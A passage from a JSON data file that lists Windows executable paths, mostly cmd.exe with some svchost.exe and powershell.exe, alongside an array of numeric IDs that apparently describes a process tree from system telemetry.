\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\devicecensus.exe\",\"c:\\\\windows\\\\system32\\\\devicecensus.exe\",\"c:\\\\windows\\\\system32\\\\devicecensus.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\compattelrunner.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\appidcertstorecheck.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\usoclient.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\"],\"path\":[\"1002\",\"1002/110\",\"1002/110/111\",\"1002/110/112\",\"1002/110/113\",\"1002/110/114\",\"1002/110/115\",\"1002/110/116\",\"1002/110/117\",\"1002/110/118\",\"1002/119\",\"1002/125\",\"1002/126\",\"1002/138\",\"1002/14\",\"1002/142\",\"1002/142/143\",\"1002/142/144\",\"1002/142/145\",\"1002/142/146\",\"1002/142/147\",\"1002/142/148\",\"1002/142/149\",\"1002/142/150\",\"1002/142/151\",\"1002/142/151/152\",\"1002/142/151/152/153\",\"1002/142/151/152/154\",\"1002/142/151/152/155\",\"1002/142/151/152/156\",\"1002/142/151/152/157\",\"1002/142/151/152/158\",\"1002/142/151/152/159\",\"1002/142/151/152/160\",\"1002/142/151/152/161\",\"1002/142/151/152/162\",\"1002/142/151/152/163\",\"1002/142/151/152/163/164\",\"1002/142/151/152/163/164/165\",\"1002/142/151/152/163/164/166\",\"1002/142/151/152/163/164/167\",\"1002/142/151/152/163/164/168\",\"1002/142/151/152/163/164/169\",\"1002/142/151/152/163/164/198\",\"1002/142/151/152/163/164/199\",\"1002/142/151/152/163/164/200\",\"1002/142/151/152/163/164/201\",\"1002/142/151/152/163/164/202\",\"1002/142/151/152/163/164/203\",\"1002/142/151/152/163/164/204\",\"1002/142/151/152/163/164/205\",\"1002/142/151/152/163/164/209\",\"1002/142/151/152/163/164/210\",\"1002/142/151/152/163/164/211\",\"1002/142/151/152/163/164/212\",\"1002/142/151/152/163/164/213\",\"1002/142/151/152/163/164/214\",\"1002/142/151/152/163/164/215\",\"1002/142/151/152/163/164/216\",\"1002/142/151/152/163/164/217\",\"1002/142/151/152/163/164/218\",\"1002/142/151/152/163/164/219\",\"1002/142/151/152/163/164/220\",\"1002/142/151/152/163/164/221\",\"1002/142/151/152/163/164/222\",\"1002/142/151/152/163/164/223\",\"1002/142/151/152/163/164/224\",\"1002/142/151/152/163/164/225\",\"1002/142/151/152/226\",\"1002/142/151/152/227\",\"1002/142/151/152/228\",\"1002/142/229\",\"1002/142/233\",\"1002/142/234\",\"1002/142/235\",\"1002/142/236\",\"1002/142/237\",\"1002/142/238\",\"1002/142/239\",\"1002/142/240\",\"1002/142/241\",\"1002/142/242\",\"1002/142/243\",\"1002/142/244\",\"1002/142/245\",\"1002/142/246\",\"1002/142/247\",\"1002/142/247/248\",\"1002/142/247/248/249\",\"1002/142/247/248/250\",\"1002/142/247/248/251\",\"1002/142/247/248/252\",\"1002/142/247/248/253\",\"1002/142/247/248/254\",\"1002/142/247/248/255\",\"1002/142/247/248/256\",\"1002/142/247/248/256/257\",\"1002/142/247/248/256/257/258\",\"1002/142/247/248/256/257/259\",\"1002/142/247/248/256/257/260\",\"1002/142/247/248/256/257/261\",\"1002/142/247/248/256/257/262\",\"1002/142/247/248/256/257/263\",\"1002/142/247/248/256/257/264\",\"1002/142/247/248/256/257/265\",\"1002/142/247/248/256/257/266\",\"1002/142/247/248/256/257/267\",\"1002/142/247/248/256/257/268\",\"1002/142/247/248/256/257/269\",\"1002/142/247/248/256/257/270\",\"1002/142/247/248/256/257/271\",\"1002/142/247/248/256/257/272\",\"1002/142/247/248/256/257/273\",\"1002/142/247/248/274\",\"1002/142/247/248/275\",\"1002/142/247/248/276\",\"1002/142/247/248/277\",\"1002/142/247/248/278\",\"1002/142/247/248/279\",\"1002/142/247/248/280\",\"1002/142/247/248/281\",\"1002/142/247/248/282\",\"1002/142/247/248/283\",\"1002/142/247/248/284\",\"1002/142/247/248/285\",\"1002/142/247/248/286\",\"1002/142/247/248/287\",\"1002/142/247/248/288\",\"1002/142/247/248/289\",\"1002/142/247/248/289/290\",\"1002/142/247/248/289/290/291\",\"1002/142/247/248/289/290/292\",\"1002/142/247/248/289/290/293\",\"1002/142/247/248/289/290/294\",\"1002/142/247/248/289/290/295\",\"1002/142/247/248/289/290/296\",\"1002/142/247/248/289/290/297\",\"1002/142/247/248/289/290/298\",\"1002/142/247/248/289/290/299\",\"1002/142/247/248/289/290/300\",\"1002/142/247/248/289/290/301\",\"1002/142/247/248/289/290/306\",\"1002/142/247/248/289/290/307\",\"1002/142/247/248/289/290/308\",\"1002/142/247/248/289/290/309\",\"1002/142/247/248/289/290/310\",\"1002/142/247/248/289/290/311\",\"1002/142/247/248/289/290/312\",\"1002/142/247/248/289/290/313\",\"1002/142/247/248/289/290/314\",\"1002/142/247/248/289/290/315\",\"1002/142/247/248/289/290/318\",\"1002/142/247/248/289/290/319\",\"1002/142/247/248/289/290/320\",\"1002/142/247/248/289/290/321\",\"1002/142/247/248/289/290/322\",\"1002/142/247/248/289/290/323\",\"1002/142/247/248/289/290/324\",\"1002/142/247/248/289/290/325\",\"1002/142/247/248/289/290/326\",\"1002/142/247/248/327\",\"1002/142/247/248/328\",\"1002/142/247/248/329\",\"1002/142/247/248/330\",\"1002/142/247/248/331\",\"1002/142/247/248/332\",\"1002/142/333\",\"1002/142/334\",\"1002/142/335\",\"1002/142/336\",\"1002/142/337\",\"1002/142/338\",\"1002/17\",\"1002/17/18\",\"1002/17/19\",\"1002/17/20\",\"1002/17/21\",\"1002/17/22\",\"1002/17/23\",\"1002/24\",\"1002/24/25\",\"1002/24/26\",\"1002/24/27\",\"1002/24/28\",\"1002/24/29\",\"1002/24/30\",\"1002/24/31\",\"1002/24/32\",\"1002/24/33\",\"1002/24/33/34\",\"1002/24/33/34/35\",\"1002/24/33/34/36\",\"1002/24/33/34/37\",\"1002/24/33/34/38\",\"1002/24/33/34/39\",\"1002/24/33/34/40\",\"1002/24/33/34/41\",\"1002/24/33/34/42\",\"1002/24/33/34/43\",\"1002/24/33/34/44\",\"1002/24/33/34/45\",\"1002/24/33/34/46\",\"1002/24/33/34/47\",\"1002/24/33/34/48\",\"1002/24/49\",\"1002/24/50\",\"1002/24/51\",\"1002/24/52\",\"1002/24/53\",\"1002/24/61\",\"1002/24/62\",\"1002/24/63\",\"1002/24/64\",\"1002/24/65\",\"1002/24/66\",\"1002/3\",\"1002/345\",\"1002/355\",\"1002/355/356\",\"1002/363\",\"1002/368\",\"1002/374\",\"1002/375\",\"1002/375/376\",\"1002/384\",\"1002/389\",\"1002/389/390\",\"1002/389/391\",\"1002/389/392\",\"1002/389/393\",\"1002/389/394\",\"1002/389/395\",\"1002/389/396\",\"1002/389/397\",\"1002/389/398\",\"1002/389/398/399\",\"1002/389/398/399/400\",\"1002/389/398/399/401\",\"1002/389/398/399/402\",\"1002/389/398/399/403\",\"1002/389/398/399/404\",\"1002/389/398/399/405\",\"1002/389/398/399/406\",\"1002/389/398/399/407\",\"1002/389/398/399/408\",\"1002/389/398/399/409\",\"1002/389/398/399/410\",\"1002/389/398/399/411\",\"1002/389/398/399/412\",\"1002/389/398/399/413\",\"1002/389/398/399/414\",\"1002/389/398/399/415\",\"1002/389/416\",\"1002/389/419\",\"1002/389/420\",\"1002/389/421\",\"1002/389/422\",\"1002/389/423\",\"1002/389/424\",\"1002/389/425\",\"1002/389/426\",\"1002/389/427\",\"1002/389/428\",\"1002/389/429\",\"1002/389/430\",\"1002/389/431\",\"1002/389/432\",\"1002/389/433\",\"1002/389/433/434\",\"1002/389/433/434/435\",\"1002/389/433/434/436\",\"1002/389/433/434/437\",\"1002/389/433/434/438\",\"1002/389/433/434/439\",\"1002/389/433/434/440\",\"1002/389/433/434/441\",\"1002/389/433/434/444\",\"1002/389/433/434/444/445\",\"1002/389/433/434/444/445/446\",\"1002/389/433/434/444/445/447\",\"1002/389/433/434/444/445/448\",\"1002/389/433/434/444/445/449\",\"1002/389/433/434/444/445/450\",\"1002/389/433/434/444/445/451\",\"1002/389/433/434/444/445/452\",\"1002/389/433/434/444/445/453\",\"1002/389/433/434/444/445/454\",\"1002/389/433/434/444/445/455\",\"1002/389/433/434/444/445/456\",\"1002/389/433/434/444/445/457\",\"1002/389/433/434/444/445/458\",\"1002/389/433/434/444/445/459\",\"1002/389/433/434/460\",\"1002/389/433/434/461\",\"1002/389/433/434/462\",\"1002/389/433/434/463\",\"1002/389/433/434/464\",\"1002/389/433/434/465\",\"1002/389/433/434/466\",\"1002/389/433/434/467\",\"1002/389/433/434/468\",\"1002/389/433/434/469\",\"1002/389/433/434/470\",\"1002/389/433/434/471\",\"1002/389/433/434/472\",\"1002/389/433/434/473\",\"1002/389/433/434/474\",\"1002/389/433/434/475\",\"1002/389/433/434/476\",\"1002/389/433/434/477\",\"1002/389/433/434/478\",\"1002/389/433/434/479\",\"1002/389/433/434/480\",\"1002/389/433/434/481\",\"1002/389/482\",\"1002/389/483\",\"1002/389/484\",\"1002/389/485\",\"1002/389/486\",\"1002/389/487\",\"1002/490\",\"1002/490/491\",\"1002/490/493\",\"1002/490/493/494\",\"1002/499\",\"1002/500\",\"1002/500/501\",\"1002/512\",\"1002/512/513\",\"1002/519\",\"1002/532\",\"1002/537\",\"1002/538\",\"1002/540\",\"1002/543\",\"1002/543/544\",\"1002/543/545\",\"1002/543/546\",\"1002/543/547\",\"1002/543/548\",\"1002/543/549\",\"1002/543/550\",\"1002/543/551\",\"1002/543/552\",\"1002/543/552/553\",\"1002/543/552/553/554\",\"1002/543/552/553/555\",\"1002/543/552/553/556\",\"1002/543/552/553/557\",\"1002/543/552/553/558\",\"1002/543/552/553/559\",\"1002/543/552/553/560\",\"1002/543/552/553/561\",\"1002/543/552/553/562\",\"1002/543/552/553/563\",\"1002/543/552/553/564\",\"1002/543/552/553/565\",\"1002/543/552/553/566\",\"1002/543/552/553/567\",\"1002/543/552/553/568\",\"1002/543/552/553/569\",\"1002/543/570\",\"1002/543/571\",\"1002/543/572\",\"1002/543/573\",\"1002/543/574\",\"1002/543/577\",\"1002/543/578\",\"1002/543/579\",\"1002/543/580\",\"1002/543/581\",\"1002/543/582\",\"1002/543/583\",\"1002/543/584\",\"1002/543/585\",\"1002/543/586\",\"1002/543/587\",\"1002/543/587/588\",\"1002/543/587/588/589\",\"1002/543/587/588/590\",\"1002/543/587/588/591\",\"1002/543/587/588/592\